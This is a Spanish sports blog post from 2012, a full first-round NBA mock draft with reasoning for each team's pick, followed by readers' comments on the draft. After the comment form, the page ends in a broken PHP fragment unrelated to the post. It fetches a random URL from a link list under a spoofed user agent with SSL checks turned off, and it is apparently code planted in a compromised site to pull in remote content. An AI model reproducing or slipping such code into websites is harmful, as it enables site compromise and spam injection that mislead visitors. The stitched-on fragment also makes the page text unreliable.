Mock Draft 2.0

14 de June de 2012 por melo15

Tras la versión 1.0 del mock llega su actualización. Esta vez con las 30 elecciones de primera ronda.

1.- New Orleans Hornets: Los Hornets podrían acabar antes de tiempo su reconstrucción si aciertan y escogen bien en este Draft. De todas maneras, la elección está cantada.

Ante la más que probable salida de Carl Landry y Chris Kaman, el juego interior de los Hornets se queda en bragas y por lo tanto,  deberían escoger al mejor jugador de este Draft y uno de los que atesora más potencial, Anthony Davis, que aportaría, principalmente, defensa e intimidación.

2.- Charlotte Bobcats: En Charlotte lloran por la más que probable pérdida de Anthony Davis pero tampoco hay que estresarse tanto. Si algo hay en este Draft es una amplia gama de ala-pívots.

Descartando a Davis, el mejor ala-pívot actualmente es Jared Sullinger, pero tiene menos potencial que Thomas Robinson, por lo que si yo fuera MJ, elegiría al jugador de Washigton. Tampoco les iría mal a los Bobcats Michael Kidd-Gilchrist, un jugador que aportaría defensa, liderazgo y espíritu ganador a un equipo que carece de ello. Los Bobcats también podrían decantarse por la elección romántica y fichar al talentoso Harrison Barnes, que últimamente está subiendo como la espuma gracias a unas pruebas atléticas excepcionales.

3.- Washington Wizards: La posición de SF es la más débil del equipo capitalino. Jan Vasely ha demostrado que puede rendir bien en la posición de 4, por lo que escogería a Kidd-Gilchrist si estuviera disponible o, si no, a Harrison Barnes. Kidd-Gichrist es una de los jugadores con más potencial del Draft, pero también está preparado para rendir desde el primer momento gracias a su defensa y ética de trabajo. Escoger a uno de los numerosos power forwards me parecería un error ya que mataría definitivamente la elección del pasado Draft.

4.- Cleveland Cavaliers: Los Cavaliers tienen su principal déficit en las posiciones de escolta y alero, por lo que la elección estaría entre Bradley Beal, que aportaría anotación y rebote, y Harrison Barnes.

5.- Sacramento Kings: Con Thomas, Thornton, Evans, Fredette y Terrence Williams, los Kings tienen un juego exterior bastante hecho pero en cambio el juego interior parece a medias. Tienen al pívot con más futuro de la liga pero la posición de power forward es un solar, por lo que escogería a Jared Sullinger y no me arriesgaría escogiendo a otros jugadores con más potencial pero que generan más dudas como Perry Jones.

6.- Portland Trail Blazers:  Los principales problemas de los Blazers se encuentran en las posiciones de 1 y 5, y este Draft puede ser una buena oportunidad para reforzarlas. Con la sexta elección escogería al jugador con más potencial de este Draft:  Andre Drummond. Ya sé que alguno me tacharéis de loco y comentaréis que Drummond está demasiado verde para jugar en una franquicia que tiene como objetivo entrar en Playoffs, pero de esta manera Drummond se encontraría en un buen ambiente y, de momento, solo tendría que defender y rebotear, algo que hace bastante bien. Si los Blazers no se atreven a escoger a Drummond, entonces intentaría bajar algunas posiciones y escoger a Tyler Zeller.

7.- Golden State Warriors: Los de Oackland tienen el equipo prácticamente hecho pero la posición mas débil es la de alero. Por esta razón elegiría a Harrison Barnes, que podría aportar desde el principio y ser la segunda o tercera referencia ofensiva del equipo. Además, tampoco es manco en otras facetas como la defensa o el rebote. En el caso de que Barnes estuviera escogido me decidiría por el tweener Terrence Jones.

8.- Toronto Raptors:  El juego interior de la franquicia de Canadá parece estar en buen camino de la mano de Bargnani y Davis. Ahora hay que centrarse en reforzar las posiciones exteriores. Jeremy Lamb es su hombre. Es un jugador que aportará desde el principio y que podría jugar de sexto hombre o de titular desplazando a DeRozan a la posición de 3. También podrían arriesgarse un poco más y escoger a Austin Rivers o a Dion Waiters, pero me parece poco probable que los  escojan teniendo disponible a Lamb.

9.- Detroit Pistons: Al contrario que otras franquicias, los Pistons tienen el equipo casi hecho. Solo les falta un buen defensor que se complemente bien con Monroe, y este jugador se llama John Henson. A pesar de su complexión delgada  es un buen defensor y no está falto de talento en ataque. Podrían escoger a Perry Jones pero no se complementaría tan bien con Monroe.

10.- New Orleans Hornets: Habiendo escogido a Davis, y teniendo a Gordon, Okafor, Ariza… solamente hace falta alguien que mueva este equipo y ese alguien es Kendall Marshall. El base de UNC es un gran distribuidor al más puro estilo Ricky Rubio, aunque peor anotador y defensor. También podrían decantarse por el base anotador Damian Lillard.

11.- Portland Trail Blazers: Resuelto el problema en la posición de pívot, toca reforzar el de posición de base. Si está disponible Kendall Marshall me decantaría por él, y si no, ficharía a Damian Lillard o Dion Waiters.

12.- Milwaukee Bucks: Tras el traspaso de Bogut, el juego interior de los Bucks es uno de los peores de la NBA. Gooden e Ilyasova han cumplido pero ante una posible salida del turco ficharía a uno de los jugadores con más potencial y riesgo de esta promoción, Perry Jones. Si no se atreven, podrían escoger entre los pívots Meyers LeonardTyler Zeller, aunque ninguno tiene el potencial de Perry.

13.- Phoenix Suns: A pesar de que en Phoenix cuentan con Dudley, Brown, Hill… el juego exterior de los Suns es uno de los peores de la NBA. Por esta razón escogería a Austin Rivers, gran anotador y que aún conserva su hype de estrella en potencia. Llega muy verde pero en Phoenix dispondría de minutos para adaptarse. Otras opciones podrían ser Dion Waiters, Terrence Ross o Tony Wroten.

14.- Houston Rockets: Houston necesita pívots. Dicho esto veo dos opciones: Meyers Leonard y Tyler Zeller. Leonard es más joven, con más potencial y mejor defensor, en cambio Tyler Zeller llega más hecho y con capacidad para aportar desde el principio, justo lo que Houston necesita, ya que su objetivo es siempre entrar en Playoffs.

15.- Philadelphia 76ers: Los Sixers tienen el equipo muy hecho pero ante la posible salida de Louis Williams y Spencer Hawes, las posiciones de 1 y 5 se quedan un poco cojas. Sabiendo esto, escogería a Dion Waiters, jugador que llega pisando muy fuerte estas últimas semanas y que puede jugar de 1 y de 2. Si buscan un pívot me quedaría con Meyers Leonard o Arnett Moultrie, según viese la directiva sixer.

16.- Houston Rockets: Kyle Lowry ya ha declarado que si el equipo de Texas renueva a Goran Dragic solicitará ser traspasado, por lo tanto utilizaría este pick para escoger a Tony Wroten, un combo guard con una capacidad para penetrar asombrosa pero con un tiro penoso y un basketball IQ muy cuestionable. Otro base como Marquis Teague llega muy verde.

17.- Dallas Mavericks: La reconstrucción de Dallas es cada día más inevitable y por esa razón escogería a un jugador con mucho potencial, Quincy Miller. El ex-jugador de Baylor apuntaba a estrella pero una grave lesión de ligamentos ha cortado en seco su progresión. Su temporada en la universidad ha sido muy cuestionada. 2’08, point-forward con buen tiro y muy polivalente, si se  acaba de recuperar puede ser el robo del draft, aunque de momento las sensaciones no apuntan en ese sentido. Otras opciones serían Terrence Jones o Terrence Ross.

18.- Minnesota Timberwolves: Los Wolves necesitan un escolta anotador como el comer, así que la opción es Terrence Ross, swingman muy atlético y con buena mano desde fuera.

19.- Orlando Magic: Los Magic necesitan un alero, alguien que tenga potencial para atar a Dwight Howard pero que aporte más o menos desde el principio para que el pívot no se estrese y haga las maletas. El único que responde a esa definición es Terrence Jones, combo-forward muy completo que estaría más arriba si no fuera por su cabecita. Si Jones no está libre, ficharía a Moe Harkless.

20.- Denver Nuggets: Los Nuggets tienen una plantilla muy completa pero siempre se puede mejorar algo. La posición que creo peor cubierta es la de escolta, por lo que escogería a Will Barton, jugador completo en ataque y con bastante potencial. Doron Lamb también es una opción pero este tiene menos potencial.

21.-Boston Celtics: Los Celtics necesitan un interior y un exterior, y tienen dos elecciones seguidas. Con la primera se podrían decantar por Meyers Leonard, si aún está libre. Si no, me haría con el ala-pívot de Missouri Arnett Moultrie.

22.-Boston Celtics: Una vez escogido al jugador interior escogería a Marquis Teague. Base atlético, buen defensor pero que llega muy, muy verde. A ver si aprende algo de Rondo.

23.- Atlanta Hawks: La posición peor cubierta de los Hawks es sin duda la de alero. Por esta razón escogería a Moe Harkless. Atlético, buen defensor y que tiene una pinta de Paul George tremenda.

24.- Cleveland Cavaliers: Si en el pick 4 los Cavs han escogido a Bradley Beal ahora les toca pillar un alero, la posición más débil del equipo. Hay bastantes opciones: la primera es Royce White, point-forward capaz de jugar en tres posiciones, con buena visión de juego y buen anotador en el poste aunque con algún que otro problema de cabeza. Otra opción sería Jeff  Taylor, alero muy completo, y la última sería Draymond Green. El ex de los Spartans no tiene un buen fisico pero derrocha calidad y liderazgo. Si en la 4 escogieron un alero, la opción más viable podría ser Tony Wroten. Si se decantan finalmente por reforzar el juego interior podrían escoger a Andrew Nicholson Arnett Moultrie, por ejemplo.

25.- Memphis Grizzlies: Con una de las plantillas más completas de la NBA, pero ante una probable salida del equipo de O.J Mayo, escogería a Doron Lamb, uno de los mejores tiradores del Draft.

26.- Indiana Pacers: Otros que tienen una plantilla muy completa. La posición peor cubierta podría ser la de pívot por lo que me haría con Arnett Moultrie, que también puede jugar de ala-pívot y que se complementaría muy bien con Hibbert.

27.- Miami Heat: Todos sabemos cuál es la peor posición del equipo del sur de Florida. Han de escoger a Fab Melo, un 7 pies buen reboteador y buen defensor.

28.- Oklahoma City Thunder: Llevamos todo el año repitiendo que los Thunder necesitan un anotador en el poste y en este Draft  lo pueden conseguir. Se trata de Andrew Nicholson, jugador con buen mano desde la media distancia que puede ayudar al equipo de Scott Brooks y que encima apunta a robo del Draft.

29.- Chicago Bulls: Ante la posible pérdida de Kyle Korver, los Bulls podrían escoger a John Jenkins, otro especialista en el tiro.

30.- Golden State Warriors: Con la marcha de Udoh a los Bucks, el juego interior de los Warriors se ha quedado un poco corto. Por eso escogería a Kevin Jones, un hustler que ha promediado 20-10 esta temporada.

Comenta

26 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Buena currada melo15, ya veremos si tus predicciones son acertadas xd

    Fuera de coña, está superbien, y ni los expertos suelen acertar, así que no vamos a pedirte eso (al menos yo). Me dio el otro día por mirar los últimos mock draft de la espn el año pasado y más de la mitad de las elecciones las habían fallado. Me ha gustado tu artículo.

      Citar

  2. txusma dice:
    #2

    Se rumorea que un equipo de lotería le ha prometido elección a Dion Waiters y yo casi que me la juego por Phoenix Suns. Austin Rivers lo veo en la 18 de los Wolves.
    Y como opinión personal, creo que Sullinger caerá un poco más y que los Bobcats pillarán a Kidd-Giltrich antes que a Robinson. A los Wizards los veo con Beal y a los Cavs con Barnes y entonces los Kings pillarían a Robinson (y eso q hace 2 días dije que no les llegaba ni de coña). Ok con Drummond a los Blazers.

      Citar

  3. Sancho88 dice:
    #3

    Pues de momento los que han hecho los entrenamientos previos al draft con los Kings son John Henson y Corey Zeller. Zeller no lo veo, porque ya tienes a Cousins, y Henson lo veo muy tirillas, muy Jason Thompson… no es lo que necesita Sacramento, aunque él ha dicho que haría una gran pareja con Cousins. Por la idiosincracia del juego de pívots, los Kings deben reforzar la posición de 4 buscando un perro de presa como Gerald Wallace. Y mira tú por donde, si ahora está buscando un buen contrato, en Sacramento hay espacio salarial más que de sobra para darle lo que pida y que juegue de 3-4 (si es que los putos Maloof quieren de una puta vez pagar algo…). Wallace ya estuvo en los Kings, y podría ser algo bueno que volviera. Sería un gran fichaje a complementar con otro alero, o si no fichar a Okafor y piyarse a Barnes…. si los Kings no hacen cagadas exóticas royo Fredette, tienen una buena oportunidad para hacerse equipazo, porque sería draftear a una joya top5 (es imposible que te equivoques con jugadorazos como los de esta hornada) y apostar por fichar a alguien medio veterano con caché, defensa y al que se le puede pagar entre 10 y 15 millones a cambio de Salmons y alguna primera ronda. Los Kings es ahora o nunca. Si no arman este año con garantías la posición de alero y ala-pívot, de ahí va a desertar Cousins, Evans y demás tropa más pronto que tarde

      Citar

  4. Sancho88 dice:
    #4

    Y por cierto Melo, enorme trabajo, enorme. Esto se lo pones a los monos del Marca y se cagan, sobre todo porque lo hace un chaval tan joven como tú. Por ponerte una pega, creo que duplicas y triplicas posiciones y elecciones. Creo que tienes criterio suficiente como para asignar un jugador por equipo. De hecho, de eso tratan los mock draft, y como bien dice Txus no suelen acertar, solo son aproximaciones, pero en tu caso están todas las primeras rondas muy bien razonadas y no necesitabas hacer loterías de hasta tres o cuatro opciones por equipo. Pero de todas maneras, excelentísimo trabajo, sí señor

      Citar

  5. Cocinitas dice:
    #5

    txusma:
    Se rumorea que un equipo de lotería le ha prometido elección a Dion Waiters y yo casi que me la juego por Phoenix Suns. Austin Rivers lo veo en la 18 de los Wolves.
    Y como opinión personal, creo que Sullinger caerá un poco más y que los Bobcats pillarán a Kidd-Giltrich antes que a Robinson.A los Wizards los veo con Beal y a los Cavs con Barnes y entonces los Kings pillarían a Robinson (y eso q hace 2 días dije que no les llegaba ni de coña). Ok con Drummond a los Blazers.

    Opino igual, y creo que Sullinger podria caer hasta el 10 y juntarse en los Hornets con Davis.

      Citar

  6. Ru dice:
    #6

    Mi corazonada en el pick 2,Harrison Barnes.En los mocks no sale tan arriba pero no sé,el hecho de que salga del equipo universitario de la región,del equipo de Jordan…me hace pensar así.Elección subjetiva claro está pero mira,de momento ha ganado posiciones con las pruebas atléticas.Por cierto,el peor parado de estas entre los principales jugadores ha sido Sullinger que se ha presentando como un jugador lentísimo.Tendrá que currárselo muchisimo en los workouts para impresionar y hacerse con una buena posición,teniendo en cuenta lo mucho que se prima ahora lo físico.

      Citar

  7. GreenPride dice:
    #7

    Gran trabajo Melo. Asumo mi absoluta nulidad de conocimientos en cuanto a la NCAA así que sólo espero que este draft que dicen que es bueno traiga nuevas estrellas a la liga y que mis Celtics se lleven a algún jugador que les pueda ayudar.

      Citar

  8. Sancho88 dice:
    #8

    Corey Zeller no… Tyler

      Citar

  9. Ru dice:
    #9

    Por cierto en Toronto han hecho primera ronda de entrenamientos Lillard y Marshall,dos PG,lo que según algunos puede significar que Calderón tiene las horas contadas en Toronto.Hablando de los Raptors,los que sigaís baloncesto FIBA,¿Valanciunas dará el salto la próxima temporada?

      Citar

  10. Esteban dice:
    #10

    a pesar de ir contra la corriente, creo que drummond estara bien arriba en el darft, sera sopresa, por mas que haya juegos perimetrales, un centro de la agilidad de drummond, terminara por ser una tentacion demasiado grande para los que tengan elecciones buenas

      Citar

  11. Esteban dice:
    #11

    seria genial que zullinger cayera hasta el 10 y pudiera cogerlo hornets, gran dupla podria hacer con davis

    siento cierto aprecio por los hornets, por el catrina y por no tener dueño perdieron a CP3, sin duda que se merecen un giño del destino

      Citar

  12. Viva_Dirk dice:
    #12

    Buen curro Melo, ahora bien si hubiera 3.0 te pido que te mojes mas, que des un solo nombre por pick.

    Creo que los Bobcats deberian asegurar a un jugador como Thomas Robinson y dejarse de romaticismos, es un ala-pivot preparado para rondar el doble-doble desde que pise la liga.

    Tanto Wizars como Cavs necesitan un alero asi que Gilchrist y Barnes se repartiran esas 2 posiciones. Si Portland elije a Drummond ya puede contratar un entrenador personal desde el primer dia para el, si no habrán desperdiciado otra gran elección. El Nº5 me parece claro para Sullinger que puede hacer estragos como pareja de Cousins, en caso de no hacerlo supongo que sería porque llegara un alero.

    Mas abajo GSW cogerá casi por obligación a Beal si llega, Toronto también se quedará con un escolta a elegir entre los que nombra Melo. Los Pistons matarian por un alero de categoría pero seguramente opten por acompañar a Monroe en la pintura, yo diria que con Perry Jones. Los Hornets tienen dos vias, elegir a Kendall Marshall o completar directamente un juego interior para muchos años, yo creo que optaran por lo segundo y podrian optar por el compañero de Davis, Terrence Jones o por un center como Tyller Zeller.

    Fuera del top ten las posibilidades son amplísimas, los Blazers elegiran un base, los Bucks un interior y los Suns deberian amarrar un buen anotador exterior que será lo mejor que les llegue.

    A parte, creo que nombres como Marquis Teague, Terrence Ross y Doron Lamb subirán en los mocks segun se acerque el draft y alguno podria sorprender dentro del top15.

      Citar

  13. Ru dice:
    #13

    ESPN–> The Bobcats are actively talking to teams about trading the No. 2 pick. Why? Not only is there no franchise player at No. 2, but I’m told there’s a bit of a split right now in Charlotte between taking Robinson or Michael Kidd-Gilchrist. Sources say Michael Jordan isn’t sold on building around the limited offensive arsenal of Kidd-Gilchrist, but the team also has questions about how high Robinson’s ceiling is.

    Ahora yo pregunto,si sois GM de un equipo y podéis haceros con la elección nº2 del draft,¿os comeriáis el contrato de Tyrus Thomas (26 millones en 3 años) ?

      Citar

  14. Esteban dice:
    #14

    tema aparte

    basket4us anuncia que gerald wallace renuncio a su año de contrato

    alguien puede explicarme en que direccion van los nets? cambiaron su ronda, que fue un puesto 6, pero podria haber sido un puesto 4, por un jugador que jugo 15 partidos con el equipo y ahora es agente libre, q desastre, hay cosas que no se entienden

    los nets podrian haber metido el puesto 6 (donde podrian caer drummond, barnes, sullinger, lamb, beal o tantos otros) mas lopez y hubiese sido un combo apetecible hasta para orlando

    ahora no tienen ni el puesto 6 ni a wallace, asi buscan armar un equipo campeon de la nba?

    deron ya esta armando las valijas rumbo a dallas

      Citar

  15. Esteban dice:
    #15

    creo que los bobcats, deberian apostar por harrison barnes o por robinson

    quiza Kidd-Gilchrist, sea un proyecto mas solido de jugador, mas completo, pero no creo que sea para un equopo tan falto de talento como los bobcats, asi paso con biyombo, un centro defensivo y de rol interesante, pero en un equipo donde nadie puede meter la bola en el aro no sirve,

    robinson podria ser el proximo año un jugador de 20 puntos, por lo menos seria la cara de un equipo tan pobre, o el mismo barnes creo que tiene buena pasta de anotador

    a Kidd-Gilchrist lo veo como un futuro gerald wallace, enorme defensor y buen anotador, pero ya lo vimos en los propios bobcats, un jugador de ese estilo no te va a llevar muy lejos

    si hay un equipo que deberia arriesgarse para elegir una potencial estrella, son los bobcats, aunque el riesgo sea alto

      Citar

  16. Txusma dice:
    #16

    Gerald Wallace aún puede firmar por los Nets. Lo que ha hecho es renunciar al último año de contrato para salir a mercado y pescar su último gran contrato. Vamos a esperar acontecimientos.

      Citar

  17. Esteban dice:
    #17

    Txusma:
    Gerald Wallace aún puede firmar por los Nets. Lo que ha hecho es renunciar al último año de contrato para salir a mercado y pescar su último gran contrato. Vamos a esperar acontecimientos.

    txuma obviamente que como agente libre puede fichar tanto por los nets como por el real madrid, justamente por eso, para que renunciar a una seleccion por un tio que no asegura su continuidad en la franquicia o que en el mejor de los casos podria haber renunciado a su ultimo año en portland y ficharlo como agente libre sin desprenderse de la ronda
    me explico?

      Citar

  18. Txusma dice:
    #18

    Esteban: txuma obviamente que como agente libre puede fichar tanto por los nets como por el real madrid, justamente por eso, para que renunciar a una seleccion por un tio que no asegura su continuidad en la franquicia o que en el mejor de los casos podria haber renunciado a su ultimo año en portland y ficharlo como agente libre sin desprenderse de la ronda
    me explico?

    Claramente.

      Citar

  19. simon dice:
    #19

    Good Job Melo!

      Citar

  20. simon dice:
    #20

    Habeis oido lo de Sullinger? si se confirma sería una autentica pena.

      Citar

  21. melo15 dice:
    #21

    Hombre Simon dinoslo! Ahora nos has dejado con la duda.
    Por cierto Sully es de los peores atletas del Draft, ha bajado bastante en los Mock Draft y ahora hay un debate, a quien escogerias vosotros? A Perry Jones? Atletico, talento, potencial, pero blando en defensa, pinta de bluff tremenda o a Sullinger, juego en el poste exquisito, buen tiro de 4-5 metros, trabajador pero mal defensor, malo atleticamente….
    La pregunta esta hecha, no os corteis.

      Citar

  22. simon dice:
    #22

    ahh perdón creia que ya lo habiais visto, segun Marca tiene una lesión en la espalda que no le va a dejar jugar muchos años por lo que su puesto en el draft podría caer incluso a segunda ronda.

      Citar

  23. melo15 dice:
    #23

    Pff….
    Ya visteis mi Mock, lo puse 5, creo que es un jugador que va mas alla del fisico y si no mirad a Kevin Love o a Al Jefferson.

      Citar

  24. txusma dice:
    #24

    Sí, pero si las franquicias tienen dudas no lo cogerán tan arriba. Mira DaJuan Blair. Hasta la 2ª ronda no sé, pero es posible que caiga por la 20 más o menos.

      Citar

  25. txusma dice:
    #25

    Revisando el mock de espn: Sullinger y Jones caen hasta la vigésima elección…

      Citar

  26. simon dice:
    #26

    Eso está vlaro con la lesión de espalda ningun equipo de arriba del draft va a tomar riesgos, lo mismo unos celtics con el 21, o equipos como Chicago, OKC, Heat si llega tan abajo se la jugarán con el. pero lottery con esos incovenientes creo que no… Tal y como hablaba melo y todos los especialistas de NCAA era uno de los jugadores de este draft que mas me apetecia ver, incluso quizás mas que al unicejo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>